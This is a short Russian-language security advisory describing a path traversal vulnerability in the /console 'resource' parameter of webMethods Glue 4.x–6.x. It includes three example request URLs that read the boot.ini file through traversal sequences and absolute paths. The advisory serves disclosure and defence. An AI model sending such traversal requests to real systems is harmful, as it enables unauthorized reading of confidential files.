Программа: 
webMethods Glue 4.x
webMethods Glue 5.x
webMethods Glue 6.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в параметре «resource» через /console URL перед отображением файлов. Атакующий может просмотреть произвольные файлы целевой системе.

Примеры:

http://glueconsole:8080/console?resource=../../../boot.ini
http://glueconsole:8080/console?resource=\boot.ini
http://glueconsole:8080/console?resource=c:\boot.ini



Оставить мнение